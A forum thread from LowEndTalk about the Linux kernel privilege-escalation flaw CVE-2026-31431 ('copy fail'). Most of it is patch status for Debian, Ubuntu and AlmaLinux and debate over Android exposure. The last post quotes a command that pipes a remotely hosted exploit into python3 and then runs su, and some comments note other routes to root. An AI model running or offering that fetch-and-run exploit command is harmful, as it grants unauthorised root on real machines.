New on LowEndTalk? Please Register and read our Community Rules.
All new Registrations are manually reviewed and approved, so a short delay after registration may occur before your account becomes active.
All new Registrations are manually reviewed and approved, so a short delay after registration may occur before your account becomes active.

Comments
Rebootless method for patching via eBPF
https://github.com/wgnet/wg.copyfail.patch
anyone knows if there is patched kernel update for debian 12 and ubuntu 24.04 ?
There isn't a patch for Debian 11/12 yet, only Debian 13 is patched so far...and only if you have the security apt repos enabled, (which I believe is default): https://security-tracker.debian.org/tracker/source-package/linux
Ubuntu 24.04 also appears to be patched because after an update I'm now running kernel v6.8.0-111-generic and the patch should be applied as of v6.8.0-107.107.
I can't guarantee any of that though, but Wazuh has stopped whining at me about it so I think my Debian 13 and Ubuntu 24.04 instances are patched now
Thanks.
So all passwords / auth tokens safely stored on Android phones are public knowledge now.
:o
Android's not really affected by this, AF_ALG is blocked by SELinux in Android
I've read so on Wikipedia but the claim narrowly targets GrapheneOS, the SELinux configuration would be up to the phone manufacturer so I suppose there could be vulnerable phones out there.
It would be cool to run the proof of concept python script on Android but it seems like a mess:
I'm not an Android Dev so don't quote me on this, but it sounds to me like sketchy Android apps just got several orders of magnitude more dangerous. From being able to do whatever they can with the permissions you can trick a user into permitting, to requesting some benign permissions to get the install and then rooting the device.
If that's true it's an enormous clusterfuck because most old and active Android devices will have already stopped getting software updates long before this dropped.
This is the most nerdy comment I read today.
Thanks @Murv .
Technically yeah, but I doubt manufacturers touch the baseline AOSP SELinux rules much.
You can actually run Python scripts on Android using Termux
(Well the embedded setuid payload in PoC would fail cuz it's x64 but I bet the Python script would fail at the first socket(AF_ALG,...) stage regardless)
https://almalinux.org/blog/2026-05-01-cve-2026-31431-copy-fail/
Updates are about to roll out to the AlmaLinux production repositories. Identical to the ones currently in testing repos.
Debian 12 patched.
https://security-tracker.debian.org/tracker/CVE-2026-31431
debian 11 patched.
Too bad i have to break 1+ year uptime on irc (Undernet) from KuroIt and AlphaVPS
just restarted all my servers to apply the patch 👍
AlmaLinux patches are live.
https://almalinux.org/blog/2026-05-01-cve-2026-31431-copy-fail/
it's pretty useless unless one has a shell already
i assume this can be used to gain root on other devices? android? routers? other IOT stuff? this could be a win
https://github.com/torvalds/linux/commit/72548b093ee38a6d4f2a19e6ef1948ae05c181f7#diff-1fbe80f89243b343de91b05a4524502fdde4cea000905f6e6576516f467f907a
"You must be held accountable for the introduction of the backdoor."
go get em tiger! 😂
https://copy.fail/#faq
Installed Windows to be safe.
He's not wrong.
I tried to update my Ubuntu 24.04.4 LTS but it keeps on coming up with
N: Some packages may have been kept back due to phasing.
I think any other suid binary with root owner will work
Any user who's a member of the docker group is also a good substitute.
welp.
An interesting comment from the HackerNews thread:
https://news.ycombinator.com/item?id=47956312
move to openbsd
I guess oracle patched also 8 version, there is new kernel for upgrade
From what I gathered if that kernel module is not loaded/available it's not exploitable ? Because on my couple servers Deb12 , Deb13, Ubuntu 24.04 systems these are not loaded and when I run curl https://copy.fail/exp | python3 && su nothing really happens and all I get is some: